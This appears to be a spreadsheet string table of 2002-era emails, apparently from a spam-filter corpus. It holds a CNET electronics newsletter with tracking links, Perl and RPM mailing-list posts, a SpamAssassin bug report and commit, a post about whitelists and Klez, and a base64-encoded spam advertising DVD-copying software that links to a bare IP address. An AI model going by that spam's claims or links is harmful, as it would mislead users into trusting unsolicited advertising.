 		&lt;a href="http://clickthru.online.com/Click?q=e1-6RvNQxk2EzmmspZPhsYK3Awi9qcR" &gt;
 		&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
     	&lt;font size="-2"&gt;In Handhelds&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 		&lt;a href="http://clickthru.online.com/Click?q=f6-QktIQMwrV7XCWpCYYRGOT9_JmpRR" &gt;Onkyo TX-DS797&lt;/a&gt; 
 		&lt;a href="http://clickthru.online.com/Click?q=0b-0NI-INQ4zFRGyVaGftmZCtvxYhFR" &gt;
 		&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;font size="-2"&gt;In Electronics&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 		&lt;a href="http://clickthru.online.com/Click?q=20-PoiFIRzzEnFAbiOtR-pp7us2Qf9R" &gt;Canon PowerShot G2&lt;/a&gt; 
 		&lt;a href="http://clickthru.online.com/Click?q=35-d6JTIbIzinKw2zkKNXLTSyPWc3uR" &gt;
 		&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;font size="-2"&gt;In Cameras&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 		&lt;a href="http://clickthru.online.com/Click?q=4a-HcgUIPpcJhEMNjFsxoLkkTKhn-yR" &gt;Pioneer HTS-910DV&lt;/a&gt; 
 		&lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX_u-bq0l6fez6pa6cIJPR" &gt;
 		&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;font size="-2"&gt;In Electronics&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 		&lt;a href="http://clickthru.online.com/Click?q=74-VAV8IZZSX0g-P40RYG8Y0gSPZxnR" &gt;Creative Labs Nomad Jukebox 3&lt;/a&gt; 
 		&lt;a href="http://clickthru.online.com/Click?q=8a-3y3dQXndGH5v0ojO3Nt-tKChBwsR" &gt;
 		&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;font size="-2"&gt;In Portable Electronics&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 		&lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JdPBuTQ0oYlcGhVIlcU_ZR" &gt;Microsoft Xbox&lt;/a&gt; 
 		&lt;a href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z1ubRHmAYqJzDxDXozLCdR" &gt;
 		&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;font size="-2"&gt;In Electronics&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 		&lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgkBHpsG_8jg0SxiPZvH6cR" &gt;Panasonic DVD-RP91 DVD player&lt;/a&gt; 
 		&lt;a href="http://clickthru.online.com/Click?q=de-7tpkQMWawpV7v2_tTbDS-BJjhoRR" &gt;
 		&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;font size="-2"&gt;In Electronics&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /EDITORS' CHOICE --&gt;
 &lt;br&gt; 
 	&lt;/td&gt;&lt;td width=9 rowspan=2&gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/dp/dd_c.gif"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
     	&lt;td width=1 bgcolor="#000000" rowspan=2&gt;
         &lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
              &lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
         &lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;
 &lt;!-- promo section --&gt;
 &lt;tr valign=top&gt;&lt;td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valign=top&gt;&lt;td width=10&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
         	&lt;td width=412&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3"&gt;&lt;br&gt;
 			&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;
 			&lt;font face="Arial, Helvetica" size="-2"&gt;July 17, 2002&lt;/font&gt;&lt;br&gt;
 			&lt;img src="http://home.cnet.com/b.gif" width="1" height="3"&gt;&lt;br&gt;
 			&lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
             	&lt;tr valign=top&gt;&lt;td width=90 align=right&gt;
                 	&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ce/cg/colind.gif" width="66" height="86" border="0"&gt;&lt;br&gt;
                     &lt;font face="arial, helvetica" size="-2" color="#666666"&gt;
                      --Colin Duwe&lt;br&gt;
                      Associate Editor&lt;br&gt;
                      CNET Electronics&lt;br&gt;&lt;/font&gt;
                  	 &lt;/td&gt;&lt;td width=10&gt;&lt;/td&gt;
                      &lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
                          &lt;font color="#333333"&gt;&lt;B&gt;Dear readers,&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
                          &lt;font size="-1"&gt;
 Everybody seems to have a cordless phone at home. But how do
 you know which models offer the best value? Well now you can
 turn to CNET. Last week, we launched our reviews of cordless
 phones. So when the time comes to replace your phone, pay a
 visit to CNET for some unbiased advice on what to buy.
 &lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwQsqwzJgCs3CyJqsjeoFR" &gt;&lt;b&gt;Read the full story&lt;/a&gt; &lt;!-- | &lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjFBen_n8Og3F-erCpGY99R" &gt;Check prices&lt;/a&gt; --&gt; &lt;/b&gt;&lt;/font&gt;
 &lt;br&gt;&lt;br&gt;
                  &lt;/td&gt;&lt;/tr&gt;
              &lt;/table&gt;
 			 &lt;/td&gt;&lt;td width=8&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
          &lt;/tr&gt;
 	&lt;/table&gt;
     &lt;!-- bottom rule --&gt;
     &lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
         &lt;tr valign=top&gt;&lt;td bgcolor="#F7D69C"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;&lt;/tr&gt;
     &lt;/table&gt;
 &lt;table border="0" width="100%" cellpadding="10" cellspacing="0"&gt;
 	&lt;tr&gt;&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
 		&lt;img src="http://www.cnet.com/i/nl/lx/sub_rev.gif" width=200 height=19 alt="Reviews and Features"&gt;&lt;br&gt;
 		&lt;img src="http://home.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 		&lt;table cellpadding=0 cellspacing=0 border=0 width=100 height=100 align=left&gt;
 			&lt;tr&gt;&lt;td valign=top&gt;&lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQFRgqOrGORl28NRQSnqQuR" &gt;
 				&lt;img src="http://electronics.cnet.com/i/ce/ps/120/9864040_120_1.gif" width="120" height="90" border="0" vspace="15"&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width=5 height=5 border=0&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;!--item 1 img above --&gt;
 	&lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6QHL3tdBDFWVhZSgRXBsR" &gt;Cordless phones: &lt;br&gt;The other wireless devices&lt;/a&gt;&lt;/b&gt;&lt;!-- &amp;nbsp;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt; --&gt;&lt;br&gt;
 	&lt;font size="-1"&gt;Are you in the market for a new cordless phone but don't know whether
   to buy a 900MHz or a 2.4GHz model or what manufacturer offers
   the best product? No sweat--check out our new line coverage
   to find the phone that fits your personal style and needs.
     &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBskdaNyBTXl_kj2ZBSJu4R" &gt;Read the full story&lt;/a&gt;&lt;!--   &amp;nbsp;&amp;#124;&amp;nbsp;
     &lt;a href="http://clickthru.online.com/Click?q=5d-JN-bIK0sQdg9gC2obvZm5yGKIaeR" &gt;Check prices&lt;/a&gt; --&gt;&lt;/b&gt;
     &lt;br clear="all"&gt;&lt;br&gt;&lt;/font&gt;
 	&lt;!--item 2--&gt;
 	&lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUfKEF-CghrqMtNXjoCKqyR" &gt;Sony DCR-VX2000: MiniDV maestro&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;br&gt;
 	&lt;font size="-1"&gt;Sony"s DCR-VX2000 gives prosumers a versatile tool for
   capturing high-quality digital video. With three CCDs, smooth
   performance, and excellent low-light capability, this
   camcorder meets the demands of avid videographers where
   lesser cameras fail.
     &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=87-izDOQ8naL8Sz-U9eplrQ8kasp4ZR" &gt;Read the review&lt;/a&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
     &lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanyyWlmlE7lXdIl9Oi-UidR" &gt;Check prices&lt;/a&gt;&lt;/b&gt;
 	&lt;br&gt;&lt;br&gt;&lt;/font&gt;
 	&lt;!--item 3--&gt;
 	&lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=b1-YjxJQ-0ddxiQPSVr9i_f_B0NLncR" &gt;Image is everything: JVC"s HDTV VCR&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 	&lt;font size="-1"&gt;The world"s first D-Theater video deck has hit the market. It
   isn"t cheap, but it sure delivers an awesome picture, with
   more than twice the resolution of DVD. Read the full review.
     &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c6-URF9QMLKsFR_ugxWdT_pfmeDx0RR" &gt;Read the review&lt;/a&gt;  &amp;nbsp;&amp;#124;&amp;nbsp;
 	&lt;a href="http://clickthru.online.com/Click?q=dc-40zzQ0Lrt5WlrXABz6gEwTinhldR" &gt;Check prices&lt;/a&gt;&lt;/b&gt;
 	&lt;br&gt;&lt;br&gt;&lt;/font&gt;
 	&lt;!--item 4--&gt;
 	&lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsFWZDpfO0H3XX8owMnercR" &gt;Harman Kardon AVR 125: All you need?&lt;/a&gt;&lt;/b&gt;&lt;!-- &amp;nbsp;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt; --&gt; &lt;br&gt;
 	&lt;font size="-1"&gt;This may be the least expensive of HK's home-theater
   receivers, but we gave it high marks for sound quality, handy
   features, and ease of use. Is it all the receiver that you
   need?
     &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=06-fP6uI482xDwlTaGmap_vCgSyiLRR" &gt;Read the review&lt;/a&gt; &amp;nbsp;&amp;#124;&amp;nbsp;
 	&lt;a href="http://clickthru.online.com/Click?q=1b-wAnhI3N2MVpOtrHQ1U5MauO37xFR" &gt;Check prices&lt;/a&gt;  &lt;/b&gt;
 	&lt;br&gt;&lt;br&gt;&lt;/font&gt;
 	&lt;!--item 5--&gt;
 	&lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=30-u8NEIRrWWMvJzgp8IeOdSKzjX19R" &gt;Sony CLIE PEG-T665C: &lt;br&gt;Perhaps the last Palm OS 4 PDA&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 	&lt;font size="-1"&gt;With a fast processor, a great color screen, and MP3 support,
   this handheld looks appealing. But with comparably priced
   Pocket PCs available and a new wave of Palm-powered devices waiting in
   the wings, the T665C is a tough call. We give you our advice.
     &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKB6rajHZVg-EDvznhjonleR" &gt;Read the full column&lt;/a&gt; &amp;nbsp;&amp;#124;&amp;nbsp;
 	&lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0IIDnrJDh24YOLpk6Td6yR" &gt;Check prices&lt;/a&gt;  &lt;/b&gt;
 	&lt;br&gt;&lt;br&gt;&lt;/font&gt;
 	&lt;!--item 6--&gt;
 	&lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=6f-3x79IOLA6Ng7PuU3RXvLF34ULXPR" &gt;Hitachi DVP725U: Classy progressive-scan player&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 	&lt;font size="-1"&gt;With sleek looks, excellent picture quality, and a sub-$200
   price tag, the DVP725U fares well against the rest of the
   budget-progressive-scan DVD player competition. Find out why
   our reviewer thinks it"s a good bargain.
     &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=84-CCOyQ60TkvpU3zWZsihsBSWgp7dR" &gt;Read the full column&lt;/a&gt; &amp;nbsp;&amp;#124;&amp;nbsp;
 	&lt;a href="http://clickthru.online.com/Click?q=99-4mtyQAdTQ5485Bw2H3f2jvrqULcR" &gt;Check prices&lt;/a&gt;  &lt;/b&gt;
 	&lt;br&gt;&lt;br&gt;&lt;/font&gt;
 &lt;br clear="all"&gt;
 	&lt;!-- coming next week 
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
         &lt;tr valign=bottom&gt;&lt;td width=200&gt;
 			&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ce/cg/later_this_week.gif" width="200" height="19" border="0" alt="Up next week"&gt;&lt;br&gt;&lt;/td&gt;
             &lt;td align=right&gt;&lt;font face="arial, helvetica" size="-1" color="#666666"&gt;&lt;b&gt;The last Palm OS 4 PDA&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;&lt;td bgcolor="#CCCCCC" colspan=2&gt;&lt;img src="http://home.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
         &lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="http://home.cnet.com/b.gif" width=1 height=8&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;font face="arial, helvetica" size="-1"&gt;Check back later this week for our review of the Sony CLIE
   PEG-T665C. This Palm OS 4.1 PDA has a built-in audio player
   so that you can listen to MP3s on the go as well as a 66MHz processor for
   better video playback. But with OS 5 expected before
   Christmas, is now the time to buy a high-end Palm?
     &lt;/font&gt;&lt;br&gt;&lt;br&gt;
 cool gear IQ 
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
         &lt;tr valign=bottom&gt;&lt;td width=75&gt;
 			&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ce/cg/sub_iq.gif" width="180" height="19" border="0" alt="Cool Gear IQ"&gt;&lt;br&gt;&lt;/td&gt;
             &lt;td width=335 align=right&gt;&lt;font face="arial, helvetica" size="-1" color="#666666"&gt;&lt;b&gt;DivXbox
 &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;&lt;td bgcolor="#CCCCCC" colspan=2&gt;&lt;img src="http://home.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
         &lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="http://home.cnet.com/b.gif" width=1 height=8&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;
   &lt;font face="arial, helvetica" size="-1"&gt; 
 Microsoft has released a media player for its Xbox game
   console that allows you to play movies recorded on CDs in the
   DivX format.
   &lt;p&gt;True or false? Put your answer in the subject of an e-mail and send it to  
   &lt;A HREF="mailto:coolgear@cnet.com?subject=slim"&gt;coolgear@cnet.com&lt;/A&gt;.
   &lt;p&gt;
   Answer to the question from the last newsletter:
   &lt;p&gt;
   Plug your Pocket PC into the USB port on the new TiVo
   Series2, and you can transfer recording onto the handheld to
   watch while you're on the go.
   &lt;p&gt;
   No, this one's false. First of all, none of the proposed
   "home-entertainment features" for the Series2 DVRs have been rolled
   out yet. And so far, neither TiVo nor its partners have
   proposed such a feature.
   &lt;p&gt;
   For answers to this week's question, check next week's newsletter.
   &lt;/font&gt;&lt;br clear="all"&gt;
 --&gt;
 &lt;!--Horizontal Brick--&gt;
 &lt;P&gt;
 &lt;IMG border=0 height=20 src="http://home.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 NOSEND="1"&gt; 
 &lt;IMG border=0 height=8 src="http://home.cnet.com/i/it/newsletter/rule2.gif" width=410 NOSEND="1"&gt; 
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 	&lt;TBODY&gt;&lt;TR vAlign=top&gt;
     	&lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
             &lt;UL&gt;  &lt;LI&gt;&lt;A 
         href="http://www.tech24.com/cnet.asp?tag=st.nl.horizontal.xpro-txt.ba_th"&gt;Live tech help. Submit your question now.&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://news.com.com/1200-1120-933954.html?tag=st.nl.horizontal.xpro-txt.newsvision"&gt;CNET News.com: Top CIOs on the future of IT.&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://www.cnet.com/techjobs/0-7067.html?tag=st.nl.horizontal.xpro-txt.tj"&gt;Find a job you love. More than 1 million postings&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://www.cnet.com/go/to?tag=st.nl.horizontal.xpro-txt&amp;destURL=http://techupdate.zdnet.com/techupdate/stories/main/0,14179,2868051,00.html"&gt;ZDNet: This IT director has had enough of Microsoft&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://electronics.cnet.com/electronics/0-9400734-1304-8810525.html?tag=st.nl.horizontal.xpro-txt.ba_ed"&gt;May Editors' Choice award: Pioneer's Home Theater System HTS-910DV&lt;/A&gt; 
 &lt;/LI&gt;
 			&lt;/UL&gt;&lt;/B&gt;&lt;/FONT&gt;
 		&lt;/TD&gt;&lt;/TR&gt;
 	&lt;/TBODY&gt;
 &lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Horizontal Brick--&gt;
 	&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- &lt;br&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="30" border="1"&gt;&lt;br&gt; --&gt;
 &lt;/td&gt;&lt;/tr&gt;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HREF='http://clickthru.online.com/Click?q=af--dq8r8pTDAnoumvxIGMR-9zEDJng-sRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=c4-Iy9lQ0WwvkFJN2skHF6q-jPexAdR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=d9-b7L_QpPwUkIP7Veie23s1N87hJcR"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href="http://clickthru.online.com/Click?q=ee-ZbmWQwDkh4Wrj930QzbMuLbLadRR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=03-13t3I3rzdpDPmt9hKQcaLlAI6OFR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=18-WhdzI98qUUmhwD7TiMEyR1N6759R" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=2d-OxQyIbKHcr3mhuxVdngyV7VDjSuR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAW1YflPz9Z5VKc-3P0BlR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHOQrDtMOYjKHbtbXYzH4R"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e412&amp;ISSUE=2002-07-17" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=6d-e8LlnbEKJCv9_-qNpZ8iKHexW9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-09-14
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 "Perl 6: Right Here, Right Now" slides ava
     posted by gnat on Friday September 13, @12:01 (news)
     http://use.perl.org/article.pl?sid=02/09/13/162209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</si>
  <si>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xine src package
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Roi wrote :
 &gt; Same as in mplayer src package
 &gt; the --with and --without not working correctly
 &gt; I do --without arts and it still want to install with arts
 This time the problem seems to be that I overestimated xine-lib's configure
 script as it seems that it doesn't support disabling arts... so if you have
 arts-devel installed, its support will be compiled in :-/
 Also, I had made another mistake and added the configure option to disable
 lirc ot xine-lib when it should have been for xine-ui.
 All this is fixed in the upcoming "fr6" release.
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
 Load : 0.08 0.15 0.11, AC on-line, battery charging: 100% (1:47)
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] [Bug 1052] New: bondedsender.com is a scam
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1052
            Summary: bondedsender.com is a scam
            Product: Spamassassin
            Version: unspecified
           Platform: Other
                URL: http://www.bondedsender.com/
         OS/Version: other
             Status: NEW
           Severity: normal
           Priority: P2
          Component: Rules
         AssignedTo: spamassassin-devel@example.sourceforge.net
         ReportedBy: friedman+spamassassin@splode.com
 The default score for bondedsender-certified domains is -10, but I do not
 believe they should be trusted and encourage you to change the default.
 * I have been spammed by their customers.
 * There is no documentation on their website about how I can complain about
   this and have their customers financially penalized for sending me unsolicited
   mail.
 * What proof do any of us have that they really even do anything about it?
   Their contract is with their customers, not with us.
 This is a scam!  Don't trust them!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</si>
  <si>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Gary Lawrence Murphy:
 &gt;This is for the whitelist fans: Can someone please tell us why the 
 &gt;following extremely frequent spam header pattern would _not_ pass a 
 &gt;whitelist test? The letter itself is most certainly spam/viral and
 &gt;was most certainly not sent by me, but I see no way you might tell that it 
 &gt;was not, nor can I see how I might charge the sender with fraud for having 
 &gt;'impersonated' my account. .. My uneducated guess  is that all they need to 
 &gt;jump expensive whitelist
 &gt;walls would be buckshot a spam-laden Klez ..
 There are several issues here.
 (1) For reasons that have nothing to do with
 commercial advertising, we need email software that
 prevents virus attacks a la Melissa and Klez. We
 simply can't continue down the path where every
 script kiddie with a grudge or political agenda can
 cause millions or billions of dollars worth of
 damage.
 (2) Very likely, email practices will evolve to the
 point that digital signatures are the standard way
 to recognize the sender of a message. Sabotaging
 your machine or otherwise compromising your private
 key will be the only way that someone can forge a
 message from you. I don't see any reason that email
 software that automatically uses digital signatures
 for contact management and whitelisting would be
 any more expensive than existing email clients.
 Unless Microsoft manages to get a defacto monopoly
 on it.
 (3) I think identity theft should be made a felony,
 with very stiff penalties, for reasons that have
 nothing to do with spam. No, obviously, simply
 parading around with a sign that says "I'm George
 Bush" is not identity theft. On the other hand,
 I think using a virus to compromise someone else's
 private key should should fall into that category.
 _________________________________________________________________
 MSN Photos is the easiest way to share and print your photos: 
 http://photos.msn.com/support/worldwide.aspx
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SACVS] CVS: spamassassin procmailrc.example,1.3,1.3.2.1
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin
 In directory usw-pr-cvs1:/tmp/cvs-serv7642
 Modified Files:
       Tag: b2_4_0
 	procmailrc.example 
 Log Message:
 added length limit to sample procmail recipe
 Index: procmailrc.example
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/procmailrc.example,v
 retrieving revision 1.3
 retrieving revision 1.3.2.1
 diff -b -w -u -d -r1.3 -r1.3.2.1
 --- procmailrc.example	16 Aug 2002 18:34:27 -0000	1.3
 +++ procmailrc.example	29 Aug 2002 13:37:43 -0000	1.3.2.1
 @@ -1,5 +1,7 @@
 -# Pipe the mail through spamassassin
 +# Pipe the mail through spamassassin, unless it's over 256k
 +# (SpamAssassin can take a long time to process large messages)
  :0fw
 +* &lt; 256000
  | spamassassin
  # Move it to the "caughtspam" mbox if it was tagged as spam
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Ralf wrote :
 &gt; Are there any reasons _not_ to use the new apt releases on RH 7.x?
 Hmmm... I don't see any :-)
 My main concern is that when rebuilding the recent packages I've made for
 Psyche on Valhalla, I'd need to lower the "Release:" tag (to keep an
 upgrade working), and that would f*ck up my CVS repository which is on my
 Valhalla box (well, I'm exagerating, It'll just make it more difficult for
 me) ;-)
 Sure, there are easy ways around this, but the easiest for me will be to
 wait until I upgrade my main box to Psyche and have Valhalla only on a
 secondary rebuild system.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</si>
  <si>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A must have for "Gadget" lovers 7134-4
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00A3_65E24E1C.A3468E63
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 Q09QWSBEVkQgTU9WSUVTIFRPIENELVINClJJR0hUIE5PVyENCg0KDQpXZSBo
 YXZlIEFsbCB0aGUgc29mdHdhcmUgeW91IG5lZWQgdG8gQ09QWSB5b3VyIG93
 biBEVkQgTW92aWVzLg0KDQpDb3B5IHlvdXIgb3duIERWRCBNb3ZpZXMgdXNp
 bmcgbm90aGluZyBtb3JlIHRoYW4gb3VyIHNvZnR3YXJlLCBhIA0KRFZELVJP
 TSBhbmQgeW91ciBDRC1SIGJ1cm5lciENCg0KQmFja3VwIHlvdXIgRFZEIE1v
 dmllIENvbGxlY3Rpb24gDQpQbGF5YmFjayBvbiBhbnkgaG9tZSBEVkQgcGxh
 eWVyKiANCk5vIEV4cGVuc2l2ZSBEVkQgQnVybmVyIFJlcXVpcmVkIA0KRnJl
 ZSBMaXZlIFRlY2ggU3VwcG9ydA0KDQogDQpMSU1JVEVEIFRJTUUgT0ZGRVIh
 IEZSRUUgRFZEIE1PVklFIE9GIFlPVVIgQ0hPSUNFISBBQ1QgTk9XIQ0KDQoN
 CjxhIGhyZWY9Imh0dHA6Ly8yMDIuMTA4LjIyMS4xOC93d3cyODIvcG9zL2R2
